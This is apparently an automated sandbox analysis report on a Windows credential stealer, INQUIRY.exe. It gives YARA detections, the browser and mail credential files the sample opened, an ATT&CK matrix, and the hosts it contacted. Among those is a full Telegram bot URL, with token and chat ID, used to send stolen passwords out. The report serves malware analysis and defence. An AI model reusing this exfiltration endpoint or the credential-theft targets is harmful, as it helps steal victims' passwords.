              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00A44E87
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A51E06 GetUserNameW,0_2_00A51E06
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A43F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00A43F3A
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A149A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected MassLogger RAT
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: INQUIRY.exeBinary or memory string: WIN_81
              Source: INQUIRY.exeBinary or memory string: WIN_XP
              Source: INQUIRY.exeBinary or memory string: WIN_XPe
              Source: INQUIRY.exeBinary or memory string: WIN_VISTA
              Source: INQUIRY.exeBinary or memory string: WIN_7
              Source: INQUIRY.exeBinary or memory string: WIN_8
              Source: INQUIRY.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected MassLogger RAT
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A86283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00A86283
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A86747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00A86747

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		12
              Native API              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		121
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Valid Accounts              		3
              Obfuscated Files or Information              		Security Account Manager1
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation              		1
              Software Packing              		NTDS137
              System Information Discovery              		Distributed Component Object Model121
              Input Capture              		3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection              		1
              DLL Side-Loading              		LSA Secrets241
              Security Software Discovery              		SSH3
              Clipboard Data              		14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Valid Accounts              		Cached Domain Credentials11
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Virtualization/Sandbox Evasion              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580751 Sample: INQUIRY.exe Startdate: 26/12/2024 Architecture: WINDOWS Score: 100 26 reallyfreegeoip.org 2->26 28 api.telegram.org 2->28 30 2 other IPs or domains 2->30 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 46 11 other signatures 2->46 8 INQUIRY.exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 26->42 44 Uses the Telegram API (likely for C&C communication) 28->44 process4 signatures5 48 Binary is likely a compiled AutoIt script file 8->48 50 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->50 52 Switches to a custom stack to bypass stack traces 8->52 11 INQUIRY.exe 2 8->11         started        14 RegSvcs.exe 8->14         started        process6 signatures7 54 Binary is likely a compiled AutoIt script file 11->54 56 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->56 58 Writes to foreign memory regions 11->58 60 Maps a DLL or memory area into another process 11->60 16 RegSvcs.exe 15 2 11->16         started        process8 dnsIp9 20 api.telegram.org 149.154.167.220, 443, 49739 TELEGRAMRU United Kingdom 16->20 22 checkip.dyndns.com 193.122.6.168, 49731, 80 ORACLE-BMC-31898US United States 16->22 24 reallyfreegeoip.org 172.67.177.134, 443, 49733 CLOUDFLARENETUS United States 16->24 32 Tries to steal Mail credentials (via file / registry access) 16->32 34 Tries to harvest and steal browser information (history, passwords, etc) 16->34 signatures10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              INQUIRY.exe45%VirustotalBrowse
              INQUIRY.exe47%ReversingLabsWin32.Trojan.Nymeria
              INQUIRY.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              		172.67.177.134
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		193.122.6.168
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        		high
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.telegram.orgRegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/botRegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://checkip.dyndns.org/qRegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4150460368.000000000308D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.0000000003060000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.comRegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://api.telegram.orgRegSvcs.exe, 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4150460368.0000000002FE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
